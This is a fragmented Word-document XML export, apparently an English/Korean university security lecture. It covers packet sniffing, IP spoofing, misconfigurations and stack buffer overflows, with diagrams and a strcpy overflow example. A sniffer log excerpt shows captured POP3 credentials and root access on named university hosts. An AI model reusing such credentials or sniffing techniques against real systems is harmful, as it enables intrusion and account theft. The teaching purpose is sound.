                  <v:line id="shape_0" from="4403,618" to="7606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618" to="4403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7,618" to="7607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618" to="6074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BS00580_" stroked="f" o:allowincell="f" style="position:absolute;left:2102;top:3797;width:1046;height:11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S00580_" stroked="f" o:allowincell="f" style="position:absolute;left:3845;top:1236;width:1046;height:11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BS00580_" stroked="f" o:allowincell="f" style="position:absolute;left:5517;top:1236;width:1046;height:11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S00580_" stroked="f" o:allowincell="f" style="position:absolute;left:7050;top:1236;width:1046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986,3178" to="986,3709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986,3178" to="2380,317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2381,0" to="2381,317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2381,0" to="5794,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5796,0" to="5796,61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5796,618" to="6074,61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6075,618" to="6075,1146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ID="BD06790_" stroked="f" o:allowincell="f" style="position:absolute;left:3636;top:3797;width:1183;height:12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381,3178" to="4190,3178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2660,3178" to="2660,3709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192,3178" to="4192,3709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03,618" to="5795,618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075,618" to="7607,618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4403,618" to="4403,1146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609,618" to="7609,1146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65,1855" to="1265,3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063;width:1813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etwork p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2769;width:180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Broadcas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etwork p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1,3092" to="5653,3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1,617" to="5864,27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2,617" to="6842,27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9,4327" to="5793,4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7;top:4042;width:1811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Hacker can s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etwork p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 whoam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roo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 hostna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gdt.postech.ac.k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 cat tcp.lo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cogs.postech.ac.kr =&gt; mx1.postech.ac.kr [110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USER nllbu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PASS cj+]PpS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UID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STA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QUI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---- [FIN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211.33.152.182 =&gt; monsky.postech.ac.kr [23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굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#'$vt100!ohh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zXfYpZgAd/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----+ [Timed Out]+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  <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="굴림" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36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3-9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IP spoof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3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s can spoof their IP address</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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s try to connect to rsh, rlogin services with spoofed IP address</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Hackers have to know the next sequence number to open TCP session with spoofed IP address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eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>This topic will be discussed la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3-10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Misconfiguration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s search for admin’s mistake</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:ind w:left="400" w:hanging="0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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:ind w:left="400" w:hanging="0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Null/simple password account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:ind w:left="400" w:hanging="0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veryone nfs export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:ind w:left="400" w:hanging="0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Writable ftp home directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:ind w:left="400" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Opened x window displa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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Buffer overflow attack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4-1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>What is buffer overflow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Write unexpected memory area by overflowing buffer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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 most famous hacking technique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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lmost all cases, buffer overflow means stack buffer overflow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Recently, heap buffer overflow attack is introduced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굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Machine and OS dependent hacking techniqu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4-2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Why do hackers try to overflow buffer?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s can execute arbitrary command by overflowing buffer while executing a program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 program can be a setuid or setgid program or a daemon program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s can execute arbitrary command with setuid, setgid, or daemon’s permission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 xml:space="preserve">4-3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Memory struc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11125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5307330" cy="2287905"/>
                <wp:effectExtent l="698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2287800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5307480" cy="2287800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1851120" y="12240"/>
                            <a:ext cx="1521000" cy="226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716760"/>
                            <a:ext cx="1528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426680"/>
                            <a:ext cx="1528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6880" y="251640"/>
                            <a:ext cx="475560" cy="28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Arial" w:hAnsi="Arial" w:eastAsia="돋움" w:cs="Arial"/>
                                  <w:color w:val="000080"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR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923400"/>
                            <a:ext cx="475560" cy="28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Arial" w:hAnsi="Arial" w:eastAsia="돋움" w:cs="Arial"/>
                                  <w:color w:val="000080"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR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679040"/>
                            <a:ext cx="591120" cy="28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Arial" w:hAnsi="Arial" w:eastAsia="돋움" w:cs="Arial"/>
                                  <w:color w:val="000080"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                                </w:rPr>
                                <w:t>Stack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0"/>
                            <a:ext cx="1568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lower memory addres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2018520"/>
                            <a:ext cx="1568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higher memory addres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0"/>
                            <a:ext cx="0" cy="224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160" cy="645120"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="textAreaLeft" fmla="*/ 0 w 817560"/>
                              <a:gd name="textAreaRight" fmla="*/ 817920 w 817560"/>
                              <a:gd name="textAreaTop" fmla="*/ 0 h 365760"/>
                              <a:gd name="textAreaBottom" fmla="*/ 366120 h 36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5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5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 xml:space="preserve">Text sec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of the executable file</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr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920"/>
                            <a:ext cx="1442160" cy="646920"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="textAreaLeft" fmla="*/ 0 w 817560"/>
                              <a:gd name="textAreaRight" fmla="*/ 817920 w 817560"/>
                              <a:gd name="textAreaTop" fmla="*/ 0 h 366840"/>
                              <a:gd name="textAreaBottom" fmla="*/ 36720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5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5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9840"/>
                            <a:ext cx="1442160" cy="755640"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="textAreaLeft" fmla="*/ 0 w 817560"/>
                              <a:gd name="textAreaRight" fmla="*/ 817920 w 81756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5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5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parame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FF0000"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                                </w:rPr>
                                <w:t>return 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local varia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etc</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr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9880" y="1678320"/>
                            <a:ext cx="144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8.75pt;width:417.9pt;height:180.15pt" coordorigin="99,175" coordsize="8358,3603">
                <v:rect id="shape_0" stroked="t" o:allowincell="f" style="position:absolute;left:3014;top:194;width:2394;height:3560;mso-wrap-style:none;v-text-anchor:middle">
                  <v:fill o:detectmouseclick="t" on="false"/>
                  <v:stroke color="#000099" weight="12600" joinstyle="miter" endcap="flat"/>
                  <w10:wrap type="none"/>
                </v:rect>
                <v:line id="shape_0" from="3006,1304" to="5412,1305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3006,2422" to="5412,2423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732;top:571;width:7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Arial" w:hAnsi="Arial" w:eastAsia="돋움" w:cs="Arial"/>
                            <w:color w:val="000080"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR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#000099" weight="12600" joinstyle="miter" endcap="flat"/>
                  <w10:wrap type="none"/>
                </v:shape>
                <v:shape id="shape_0" stroked="t" o:allowincell="f" style="position:absolute;left:3732;top:1629;width:7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Arial" w:hAnsi="Arial" w:eastAsia="돋움" w:cs="Arial"/>
                            <w:color w:val="000080"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR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000099" weight="12600" joinstyle="miter" endcap="flat"/>
                  <w10:wrap type="none"/>
                </v:shape>
                <v:shape id="shape_0" stroked="t" o:allowincell="f" style="position:absolute;left:3732;top:2819;width:93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Arial" w:hAnsi="Arial" w:eastAsia="돋움" w:cs="Arial"/>
                            <w:color w:val="000080"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                          </w:rPr>
                          <w:t>Stack</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                  <v:fill o:detectmouseclick="t" on="false"/>
                  <v:stroke color="#000099" weight="12600" joinstyle="miter" endcap="flat"/>
                  <w10:wrap type="none"/>
                </v:shape>
                <v:shape id="shape_0" stroked="f" o:allowincell="f" style="position:absolute;left:5987;top:175;width:246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lower memory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3354;width:246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higher memory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175" to="5805,3702" stroked="t" o:allowincell="f" style="position:absolute">
                  <v:stroke color="black" weight="12600" dashstyle="shortdot" endarrow="classic" endarrowwidth="medium" endarrowlength="medium" joinstyle="miter" endcap="flat"/>
                  <v:fill o:detectmouseclick="t" on="false"/>
                  <w10:wrap type="non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99;top:175;width:2270;height:1015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 xml:space="preserve">Text sec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of the executable fil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9;top:1293;width:2270;height:1018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9;top:2411;width:2270;height:118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parame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FF0000"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                          </w:rPr>
                          <w:t>return addr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local varia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etc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823,2818" to="4824,3690" stroked="t" o:allowincell="f" style="position:absolute;flip:y">
                  <v:stroke color="black" weight="12600" dashstyle="shortdot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4-4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Stack overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림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7305</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>536575</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270" cy="37807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8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2.25pt" to="302.2pt,339.9pt" stroked="t" o:allowincell="f" style="position:absolute">
                <v:stroke color="black" weight="1260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341245</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1212215" cy="180276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802880"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="121212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0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0" cy="180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1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121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121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121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121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028160"/>
                            <a:ext cx="989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FF0000"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                                </w:rPr>
                                <w:t>Return Addr.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375560"/>
                            <a:ext cx="990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Argument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88320"/>
                            <a:ext cx="989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sf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344880"/>
                            <a:ext cx="989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Local Var.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4.35pt;width:95.4pt;height:141.9pt" coordorigin="3960,3687" coordsize="1908,2838">
                <v:line id="shape_0" from="3960,3687" to="3960,6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69,3687" to="5869,6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4227" to="5868,4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4768" to="5868,47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5309" to="5868,5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5850" to="5868,58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6390" to="5868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35;top:5306;width:155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FF0000"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                          </w:rPr>
                          <w:t>Return Ad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5853;width:1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Argu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4771;width:155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sf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4230;width:155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Local V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795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>880745</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270" cy="137414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7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69.35pt" to="310.9pt,177.5pt" stroked="t" o:allowincell="f" style="position:absolute">
                <v:stroke color="#0000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795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2684780</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270" cy="13747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7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211.4pt" to="310.9pt,319.6pt" stroked="t" o:allowincell="f" style="position:absolute">
                <v:stroke color="#0000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2695</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>880745</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="16510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69.35pt" to="310.8pt,69.4pt" stroked="t" o:allowincell="f" style="position:absolute;flip:x">
                <v:stroke color="#0000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2695</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2254885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="165100" cy="1905"/>
                <wp:effectExtent l="635" t="3746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77.55pt" to="310.8pt,177.65pt" stroked="t" o:allowincell="f" style="position:absolute;flip:x">
                <v:stroke color="#0000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2695</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2684780</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="165100" cy="1905"/>
                <wp:effectExtent l="0" t="3746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211.4pt" to="310.8pt,211.5pt" stroked="t" o:allowincell="f" style="position:absolute;flip:x">
                <v:stroke color="#0000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2695</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4059555</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="165100" cy="1905"/>
                <wp:effectExtent l="635" t="3746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319.65pt" to="310.8pt,319.75pt" stroked="t" o:allowincell="f" style="position:absolute;flip:x">
                <v:stroke color="#0000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795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1567815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="110490" cy="190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23.45pt" to="319.5pt,123.55pt" stroked="t" o:allowincell="f" style="position:absolute">
                <v:stroke color="#0000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795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3371850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="16510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265.5pt" to="323.8pt,265.6pt" stroked="t" o:allowincell="f" style="position:absolute">
                <v:stroke color="#0000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101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="760730" cy="3549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돋움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  <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Mem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9pt;height:27.95pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:8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돋움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  <w:sz w:val="24"/>
                        </w:rPr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굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림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305</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>218440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1306195" cy="2355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lower address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.55pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:17.2pt;mso-position-vertical-relative:text;margin-left:302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lowe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굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림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212215" cy="18034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803240"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="121212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1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121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121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121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200"/>
                            <a:ext cx="121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028160"/>
                            <a:ext cx="9892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FF0000"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                                </w:rPr>
                                <w:t>Return Addr.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371600"/>
                            <a:ext cx="9892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Argument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89760"/>
                            <a:ext cx="9892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sf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340920"/>
                            <a:ext cx="9892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Local Var.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25pt;width:95.4pt;height:141.95pt" coordorigin="3960,125" coordsize="1908,2839">
                <v:line id="shape_0" from="3960,125" to="3960,2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69,125" to="5869,2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665" to="5868,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1206" to="5868,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1747" to="5868,1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2288" to="5868,2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2829" to="5868,2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35;top:1744;width:155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FF0000"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                          </w:rPr>
                          <w:t>Return Ad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2285;width:155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Argu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1211;width:155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sf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662;width:155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Local V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굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림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115820" cy="2574290"/>
                <wp:effectExtent l="6350" t="6350" r="6350" b="825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2574360"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2115720" cy="2574360"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="367560"/>
                            <a:ext cx="1836360" cy="220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void function(int a, int b, int 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char buffer[8]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void main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function(1,2,3)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0"/>
                            <a:ext cx="11872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Example program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15pt;width:166.6pt;height:202.7pt" coordorigin="360,83" coordsize="3332,4054">
                <v:shape id="shape_0" fillcolor="white" stroked="t" o:allowincell="f" style="position:absolute;left:360;top:662;width:2891;height:34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void function(int a, int b, int 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char buffer[8]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void main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function(1,2,3)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22;top:83;width:186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Example progra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  <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림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5585</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>11430</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1231900" cy="5727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7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Stack of functio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45.1pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:0.9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Stack of functio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  <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림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-12700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1062990" cy="3276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Stack of Mai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7pt;height:25.8pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:-1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Stack of Mai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  <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림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305</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>34290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1420495" cy="2355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higher memory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8.55pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:2.7pt;mso-position-vertical-relative:text;margin-left:302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higher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8605</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2386965</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="11239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87.95pt" to="329.95pt,187.95pt" stroked="t" o:allowincell="f" style="position:absolute">
                <v:stroke color="#0000c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7800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="668655" cy="3371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3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Mem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6.55pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:8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6210</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="34290" cy="3314700"/>
                <wp:effectExtent l="635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0pt" to="314.95pt,260.95pt" stroked="t" o:allowincell="f" style="position:absolute">
                <v:stroke color="black" weight="1260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77290" cy="2355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lower address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.5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lowe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936115" cy="2512695"/>
                <wp:effectExtent l="6350" t="6350" r="6350" b="825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2512800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1936080" cy="2512800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="278280"/>
                            <a:ext cx="1836360" cy="22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void function(int a, int b, int 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char buffer[8]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void main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function(1,2,3)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돋움" w:cs="Helvetica;Arial"/>
                                  <w:color w:val="000000"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR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0"/>
                            <a:ext cx="642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예제프로그램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05pt;width:152.45pt;height:197.85pt" coordorigin="180,61" coordsize="3049,3957">
                <v:shape id="shape_0" fillcolor="white" stroked="t" o:allowincell="f" style="position:absolute;left:180;top:499;width:2891;height:3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void function(int a, int b, int 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char buffer[8]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void main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function(1,2,3)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돋움" w:cs="Helvetica;Arial"/>
                            <w:color w:val="000000"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR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17;top:61;width:1011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예제프로그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28370" cy="211582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2115720"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="928440" cy="2115720"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="406440"/>
                            <a:ext cx="9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9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9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9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9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920"/>
                            <a:ext cx="9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9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708200"/>
                            <a:ext cx="759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FF"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-K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379880"/>
                            <a:ext cx="759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FF"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-K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058040"/>
                            <a:ext cx="759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FF"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-K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731520"/>
                            <a:ext cx="759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FF"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                                </w:rPr>
                                <w:t>ret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04640"/>
                            <a:ext cx="759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FF"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                                </w:rPr>
                                <w:t>sf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80640"/>
                            <a:ext cx="759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FF"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR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1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73.1pt;height:166.55pt" coordorigin="4500,180" coordsize="1462,3331">
                <v:line id="shape_0" from="4500,820" to="5961,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308" to="5961,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1333" to="5961,1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1846" to="5961,1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2358" to="5961,2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2871" to="5961,2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3385" to="5961,3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32;top:2870;width:11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FF"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-K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2353;width:11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FF"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-K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846;width:11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FF"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-K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332;width:11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FF"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                          </w:rPr>
                          <w:t>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818;width:11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FF"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                          </w:rPr>
                          <w:t>sf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307;width:11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FF"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR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2,180" to="5962,3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180" to="4500,3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195326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153.75pt" stroked="t" o:allowincell="f" style="position:absolute">
                <v:stroke color="#0000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1682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0pt" to="319.15pt,0pt" stroked="t" o:allowincell="f" style="position:absolute;flip:x">
                <v:stroke color="#0000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925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>114300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="322580" cy="373380"/>
                <wp:effectExtent l="6985" t="17145" r="9525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332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2.75pt;margin-top:9pt;width:25.35pt;height:2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8300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>154305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1231900" cy="4298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2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Stack of functio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33.85pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:12.1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Stack of functio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5565</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>571500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1682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45pt" to="319.15pt,45pt" stroked="t" o:allowincell="f" style="position:absolute;flip:x">
                <v:stroke color="#0000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371600" cy="2355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higher memory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55pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:81pt;mso-position-vertical-relative:text;margin-left:3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higher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0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-12700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1212215" cy="3683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Example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45pt;height:29pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:-1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Exampl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5609590" cy="2843530"/>
                <wp:effectExtent l="0" t="0" r="76200" b="7620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91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 xml:space="preserve">void </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:eastAsia="돋움" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:b/>
                                <w:i/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>function</w:t>
                            </w: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(char *st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char buffer[10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돋움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eastAsia="돋움" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:b/>
                                <w:i/>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>strcpy(buffer,str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 xml:space="preserve">void </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:eastAsia="돋움" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:b/>
                                <w:i/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>main</w:t>
                            </w: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 xml:space="preserve">(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char large_str[255]; int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for (I=0;I&lt;255;I++) large_str[I] = ‘A’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돋움" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:b/>
                                <w:i/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>function</w:t>
